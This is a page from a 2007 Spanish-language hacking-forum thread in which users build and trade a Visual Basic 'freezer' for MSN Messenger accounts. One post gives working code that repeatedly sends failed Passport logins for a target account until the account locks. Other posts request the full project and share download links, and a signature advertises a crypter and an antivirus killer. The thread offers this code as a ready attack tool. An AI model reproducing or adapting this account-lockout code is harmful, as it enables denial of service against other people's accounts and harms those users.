elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Curso de javascript por TickTack


+  Foro de elhacker.net
|-+  Programación
| |-+  Programación General
| | |-+  .NET (C#, VB.NET, ASP)
| | | |-+  Programación Visual Basic (Moderadores: LeandroA, seba123neo)
| | | | |-+  Fabricando un congelador tipo ice cold en vb[Optimizado]
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: 1 2 3 4 [5] 6 7 8 Ir Abajo Respuesta Imprimir
Autor Tema: Fabricando un congelador tipo ice cold en vb[Optimizado]  (Leído 30,003 veces)
Tughack


Desconectado Desconectado

Mensajes: 490


Ver Perfil
Re: Fabricando un congelador tipo ice cold en vb
« Respuesta #40 en: 2 Agosto 2007, 02:22 am »

Exacto! Veo k entiendeste perfectamente lo k dice.

La diferencia esk lo hago con el control inet ya k no me importa la dependencia y no hay k hacer nada como la funcion Satura.

Aki la parte del codigo k uso para los requests:

Código:
.
.
.
    Case "USR 3"
        sTmp = Split(sData, "USR 3 TWN S ")
        sChallengeString = sTmp(1)
        netMain.Execute "https://nexus.passport.com/rdr/pprdr.asp", "GET"
        Do Until netMain.StillExecuting = False
            DoEvents
        Loop
        iStart = InStr(netMain.GetHeader("PassportURLs"), "DALogin=") + 8
        iLength = InStr(iStart, netMain.GetHeader("PassportURLs"), ",")
        sDALogin = Mid(netMain.GetHeader("PassportURLs"), iStart, iLength - iStart)
        netMain.Execute "https://" & sDALogin, "GET", , "Authorization: Passport1.4 OrgVerb=GET,OrgURL=http%3A%2F%2Fmessenger%2Emsn%2Ecom,sign-in=" & FixAccount(txtAccount.Text) & ",pwd=password," & sChallengeString
        Do Until netMain.StillExecuting = False
            DoEvents
        Loop
        If bLock = True Then
            If stbMain.Panels(1).Text <> ">> Account Frozen!" Then
                If stbMain.Panels(1).Text <> ">> Freezing... [90%]" Then
                    iStatus = iStatus + 10
                    stbMain.Panels(1).Text = ">> Freezing... [" & iStatus & "%]"
                    Call basTray.Modify(Me, "ICEBERG", "Freezing... [" & iStatus & "%]")
                Else
                    iStatus = 0
                    stbMain.Panels(1).Text = ">> Account Frozen!"
                    Call basTray.Modify(Me, "ICEBERG", "Account Frozen!")
                End If
            End If
            sckMain.Close
            sckMain.Connect "messenger.hotmail.com", 1863
        End If
    End Select
.
.
.

Salu2 ;)


En línea

Kizar


Desconectado Desconectado

Mensajes: 1.325


kizar_net


Ver Perfil
Re: Fabricando un congelador tipo ice cold en vb
« Respuesta #41 en: 2 Agosto 2007, 03:38 am »

Yo use las apis porque así lo hacia = que el icecold y no me rompía la cabeza.
En todo caso lo que no entiendo es toda la tacada de código que a puesto el que inicio este hilo si se puede hacer con las lineas que lo he hecho yo.


En línea

Tughack


Desconectado Desconectado

Mensajes: 490


Ver Perfil
Re: Fabricando un congelador tipo ice cold en vb
« Respuesta #42 en: 2 Agosto 2007, 04:34 am »

Citar
Yo use las apis porque así lo hacia = que el icecold y no me rompía la cabeza.

Si eso da =, el controlo inet no es mas k un ocx k utiliza esas apis, aunk es mas facil de usar xD

Citar
En todo caso lo que no entiendo es toda la tacada de código que a puesto el que inicio este hilo si se puede hacer con las lineas que lo he hecho yo.

100% de acuerdo, lo dice hace unos posts atras..

Salu2
En línea

drakolive

Desconectado Desconectado

Mensajes: 141


Ver Perfil
Re: Fabricando un congelador tipo ice cold en vb
« Respuesta #43 en: 2 Agosto 2007, 16:35 pm »

Tughack podrias postear el proyecto completo?
En línea

nhaalclkiemr


Desconectado Desconectado

Mensajes: 1.678


Máximo exponente 9DB9F1AEED2FADBDE 997BBE20FEDA92


Ver Perfil WWW
Re: Fabricando un congelador tipo ice cold en vb
« Respuesta #44 en: 2 Agosto 2007, 16:42 pm »

Tughack podrias postear el proyecto completo?

Hay k leer:

He subido el proyecto entero, para que bloquee tiene que llegar al 100%
http://www.mediafire.com/?4vcnhw2dcyu

http://www.mediafire.com/?4vcnhw2dcyu

Saludos ;)
En línea

StasFodidoCrypter 1.0 - 100% (old)
StasFodidoCrypter 2.0 - 85% (deserted)
Fire AV/FW-Killer - 97% (deserted)
R-WlanXDecrypter 1.0- 100%
Tughack


Desconectado Desconectado

Mensajes: 490


Ver Perfil
Re: Fabricando un congelador tipo ice cold en vb
« Respuesta #45 en: 2 Agosto 2007, 16:50 pm »

Tughack podrias postear el proyecto completo?

Hay k leer:

He subido el proyecto entero, para que bloquee tiene que llegar al 100%
http://www.mediafire.com/?4vcnhw2dcyu

http://www.mediafire.com/?4vcnhw2dcyu

Saludos ;)

Se referia a mi Freezer, el Iceberg, hasta ahora solo postee el binario.

Tughack podrias postear el proyecto completo?

Pues no se pork, con el codigo de kizar ya lo pueden hacer bien. Creo k este tema ha sido bien explorado en lo k toca a codigo, solo tienen k leer y haran uno k funcione.

Salu2
En línea

Freeze.


Desconectado Desconectado

Mensajes: 2.732



Ver Perfil WWW
Re: Fabricando un congelador tipo ice cold en vb
« Respuesta #46 en: 2 Agosto 2007, 20:47 pm »

Sep pero el se refiere al de TugHack... si no me equivoco...
En línea

drakolive

Desconectado Desconectado

Mensajes: 141


Ver Perfil
Re: Fabricando un congelador tipo ice cold en vb
« Respuesta #47 en: 3 Agosto 2007, 03:50 am »

Si me referia al de TugHack... el de kisar que lo posteo completo no me freeaba las cuentas...pero del de Tughack parece q si lo hace y bastante bien..
asi q xq no compartirlo... la mayoria no del todo xq  se que ha sido mucho trabajo para ti.
Gracias TugHack.
kizar tbn ya esta apunto de lograrlo que bien...
En línea

Kizar


Desconectado Desconectado

Mensajes: 1.325


kizar_net


Ver Perfil
Re: Fabricando un congelador tipo ice cold en vb
« Respuesta #48 en: 3 Agosto 2007, 04:27 am »

Esto esta mucho mejor que el proyecto que subi:
http://foro.elhacker.net/index.php/topic,174279.msg828579.html#msg828579
En línea

drakolive

Desconectado Desconectado

Mensajes: 141


Ver Perfil
Re: Fabricando un congelador tipo ice cold en vb
« Respuesta #49 en: 3 Agosto 2007, 18:12 pm »

pero el proyecto completo?
En línea

Páginas: 1 2 3 4 [5] 6 7 8 Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
BitCoin: fabricando dinero digital ¿a costa de terceros?
Noticias
wolfbcn 9 5,307 Último mensaje 17 Junio 2011, 01:10 am
por dantemc
Juego sin engine y mal optimizado
Programación General
AWES0MN 0 4,125 Último mensaje 26 Enero 2013, 22:45 pm
por AWES0MN
Fabricando una Carcasa para Raspberry Pi
Hardware
B€T€B€ 0 1,657 Último mensaje 31 Julio 2019, 01:46 am
por B€T€B€
pregunto sobre el congelador o.o
Foro Libre
nightcode 4 2,240 Último mensaje 13 Octubre 2020, 21:02 pm
por Tachikomaia
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines